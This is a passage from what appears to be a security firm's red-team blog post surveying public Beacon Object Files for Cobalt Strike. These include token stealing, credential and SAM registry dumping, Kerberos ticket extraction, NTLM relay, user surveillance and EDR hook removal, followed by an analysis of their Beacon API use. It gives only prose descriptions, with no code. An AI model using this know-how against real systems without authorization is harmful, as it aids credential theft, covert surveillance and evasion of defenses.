Koh is a token stealing tool implemented using a server/client architecture. The server, written in C#, is injected into a high-privileged process, such as one running with SYSTEM permissions, where it can continuously monitor and capture user tokens and logon sessions. By operating independently of the C2 infrastructure, the server persists in the target environment, enabling long-term operation without relying on constant communication with the attacker’s framework. The client, on the other hand, is implemented as a BOF. It is designed to allow users to send commands to the server, retrieve and use captured tokens for impersonation and configure its behavior as needed. This server/client architecture avoids the limitations of BOFs, which are inherently ephemeral and tied to the lifecycle of the C2 beacon, meaning that they should not be used for long-running tasks.

mertdas/PrivKit

PrivKit is a set of BOFs designed to identify privilege escalation vulnerabilities resulting from misconfigurations in Windows operating systems, thus supporting the work during the reconnaissance phase. The following misconfiguration types can be detected:

  • Unquoted service paths
  • Autologin registry key set
  • “Always Install Elevated” registry key set
  • Modifiable autorun folders
  • Existence of known hijackable paths
  • Possible enumeration of credentials from credential manager
  • Misconfigured token privileges

Although the description in the repository says that PrivKit is a single BOF, it actually consists of seven individual smaller BOFs that are bundled into one Cobalt Strike command with the help of Aggressor Script.

CodeXTF2/ScreenshotBOF

ScreenshotBOF is a utility to capture screenshots from within a Cobalt Strike beacon using non-malicious Windows APIs. The screenshots can be saved on disk on the target’s computer or kept in memory for transmission over the C2 channel.

wavvs/nanorobeus

Nanorobeus is a post-exploitation BOF to facilitate privilege escalation, credential dumping and lateral movement within a compromised Windows environment. While doing virtually the same as the popular tool “Rubeus”, but as a BOF, it automates the extraction of information, such as credentials, tokens and service accounts, by utilizing Windows API calls and manipulating native OS processes. Additionally, it supports common attack techniques like Kerberoasting, pass the hash, and pass the ticket to bypass authentication mechanisms and move laterally between machines.

zyn3rgy/smbtakeover

The smbtakeover repository provides techniques to unbind and rebind TCP port 445 on Windows systems without the need to load drivers, inject modules into the LSASS or reboot the target machine. This approach facilitates SMB-based NTLM relay attacks during C2 operations. The repository includes PoC implementations in both Python and as BOF, utilizing RPC over TCP for remote machine targeting.

CodeXTF2/WindowSpy

WindowSpy is a BOF designed for targeted user surveillance. Its primary objective is to activate surveillance capabilities only for specific scenarios, such as browser login pages, sensitive documents or VPN login screens. This approach enhances stealth by reducing the risk of detection associated with repeated surveillance activities, like taking frequent screenshots. Additionally, it streamlines operations for red teams by minimizing the volume of surveillance data, saving time that would otherwise be spent analyzing extensive logs generated by constant keylogging or screen monitoring.

rsmudge/unhook-bof

Unhook-BOF is a simple BOF that removes API hooks from the beacon process. API hooking is often used by EDR software to monitor running processes. This allows certain malicious function calls or memory accesses to be detected and prevented at runtime. With Unhook-BOF, these externally set API hooks can be removed to make the process stealthier.

EncodeGroup/BOF-RegSave

BOF-RegSave is designed to facilitate privilege escalation and registry key extraction. It enables the beacon to acquire the necessary system privileges and retrieve the SAM, SYSTEM and SECURITY keys from the Windows registry. These keys can then be analyzed offline to extract password hashes and other sensitive data, aiding in post-exploitation activities. By targeting these critical registry keys, the BOF provides a streamlined and efficient method for gathering credentials and escalating access during red team operations. The results are stored on disk and must be manually extracted afterwards.

boku7/whereami

Whereami is a BOF that extracts information about the running beacon in an OPSEC way. It does this by using handwritten shellcode to return the process environment strings without accessing any DLLs. The shellcode extracts the same information returned from whoami.exe (along with other environment values) from the beacon processes memory. There exists a similar BOF within the CSSituational-Awareness-BOF collection that can be used to acquire the same information.

connormcgarr/tgtdelegation

Tgtdelegation is a BOF to obtain a usable Kerberos Ticket Granting Ticket (TGT) for the current user using the well-known “TGT delegation trick”. A Service Principal Name (SPN) can also be specified if the default SPN is not configured for unconstrained delegation. The process extracts the TGT from Windows API calls and prepares it for the specified target, which must support unconstrained delegation. This approach simplifies obtaining and leveraging Kerberos tickets for red team operations.

ASkyeye/Cobalt-Clip

Cobalt-Clip is a BOF that enables interaction with a target’s clipboard during post-exploitation activities. It allows for dumping and setting the current contents of it, while also offering an option to monitor the clipboard for changes, providing details such as the updated content, the active window at the time of change and the timestamp, using the clipmon command. This command operates as a reflective DLL instead of within a BOF – correctly adhering to the intended design of BOFs not being used for long-running tasks – and is initiated as a job using the bdllspawn function within the Aggressor Script.

Assessing Beacon API and Aggressor Script Usage

To determine the use of the Beacon APIs, we used the GitHub Search API. It is ideal for finding function calls, for example. We searched explicitly for the function names of the Beacon APIs and found out the following:

  • All but two BOFs use the Data Parser API (the other two are not parameterized)
  • Only 3 of 15 BOFs use the Format API directly
  • All BOFs except one use the Output API, which means they are directly dependent on the Format API as well
  • One BOF used the Token API
  • One BOF used the Spawn+Inject API
  • One BOF used the Key/Value Store API
  • The remaining APIs were completely unused

All the BOFs mentioned come with an Aggressor Script file. Some BOFs are dependent on it and cannot be run standalone. However, this does only apply to all of them: The CS-Situational-Awareness-BOF and CS-Remote-Ops-BOF collections are designed for standalone execution, which means that a large number of smaller tasks can already be performed.

DFR is used by almost all of the BOFs. Two other BOFs resolve the functions themselves using LoadLibraryA and GetProcAddress (maybe the authors did not know DFR existed?). Approximately half of the BOFs that use DFR also use TrustedSec’s bofdefs.h.

More complex BOFs such as the token stealing toolkit Koh are much more difficult to separate from Aggressor Script, mainly due to their non-standard client/server architecture. Some of the BOFs are only executed as a “reaction” to an Aggressor Script event, such as WindowSpy, which is executed at certain intervals, like on beacon check-ins. Such approaches are difficult to transfer to Mythic as they are, but the techniques used can be easily rewritten to work without the Aggressor Script dependency with some time investment. However, this list of BOFs clearly demonstrates how powerful they can be.

Conclusion

In this second part of the blog post series, we looked at various public BOF implementations. Hopefully, it showed how versatile and powerful they can by and why they are indispensable for us too.

In the next part of this blog post, we will dive in with more technical details. We will show how we have implemented our own BOF loader in order to facilitate execution of several of the BOFs shown in this part.

Consultant

Category
Date
Navigation

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.
Search
Search